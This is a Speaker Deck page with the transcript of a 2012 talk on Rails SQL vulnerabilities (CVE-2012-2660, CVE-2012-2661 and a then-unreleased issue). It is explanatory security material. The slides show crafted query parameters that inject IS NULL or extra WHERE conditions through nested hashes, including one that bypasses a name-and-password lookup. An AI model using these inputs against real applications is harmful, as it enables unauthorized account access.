Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Sponsored
·
Your Podcast. Everywhere. Effortlessly.
Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
→
Justin Collins
April 23, 2015
Programming
0
78
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
160
The Evolution of Rails Security
presidentbeef
1
840
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
150
Practical Static Analysis for Continuous Application Security
presidentbeef
0
220
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
470
Continuous Security with Practical Static Analysis
presidentbeef
1
340
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
260
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.2k
Tales from the Crypt
presidentbeef
1
260
Other Decks in Programming
See All in Programming
CSC307 Lecture 06
javiergs
PRO
0
680
コントリビューターによるDenoのすゝめ / Deno Recommendations by a Contributor
petamoriken
0
200
QAフローを最適化し、品質水準を満たしながらリリースまでの期間を最短化する #RSGT2026
shibayu36
2
4.2k
Smart Handoff/Pickup ガイド - Claude Code セッション管理
yukiigarashi
0
110
360° Signals in Angular: Signal Forms with SignalStore & Resources @ngLondon 01/2026
manfredsteyer
PRO
0
100
humanlayerのブログから学ぶ、良いCLAUDE.mdの書き方
tsukamoto1783
0
180
AI Agent Tool のためのバックエンドアーキテクチャを考える #encraft
izumin5210
6
1.8k
2年のAppleウォレットパス開発の振り返り
muno92
PRO
0
200
SourceGeneratorのススメ
htkym
0
180
0→1 フロントエンド開発 Tips🚀 #レバテックMeetup
bengo4com
0
540
ThorVG Viewer In VS Code
nors
0
760
TerraformとStrands AgentsでAmazon Bedrock AgentCoreのSSO認証付きエージェントを量産しよう!
neruneruo
4
2.7k
Featured
See All Featured
Save Time (by Creating Custom Rails Generators)
garrettdimon
PRO
32
2k
Writing Fast Ruby
sferik
630
62k
How Fast Is Fast Enough? [PerfNow 2025]
tammyeverts
3
450
Digital Ethics as a Driver of Design Innovation
axbom
PRO
1
170
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
31
9.9k
Making Projects Easy
brettharned
120
6.6k
Measuring Dark Social's Impact On Conversion and Attribution
stephenakadiri
1
110
Between Models and Reality
mayunak
1
180
ReactJS: Keep Simple. Everything can be a component!
pedronauck
666
130k
Product Roadmaps are Hard
iamctodd
PRO
55
12k
Highjacked: Video Game Concept Design
rkendrick25
PRO
1
280
Introduction to Domain-Driven Design and Collaborative software design
baasie
1
580
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1
presidentbeef
javiergs
petamoriken
shibayu36
yukiigarashi
manfredsteyer
tsukamoto1783
izumin5210
muno92
htkym
bengo4com
nors
neruneruo
garrettdimon
sferik
tammyeverts
axbom
eileencodes
brettharned
stephenakadiri
mayunak
pedronauck
iamctodd
rkendrick25
baasie
![ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_2.jpg){kind=link}
![Query Parameters ?name[] {"name"=>[nil]}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_3.jpg){kind=link}
![ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_4.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_7.jpg){kind=link}
![ActiveRecord Query User.where("users.name" => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_8.jpg){kind=link}
![Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_9.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name], :password => params[:password])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_13.jpg){kind=link}
![Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_14.jpg){kind=link}
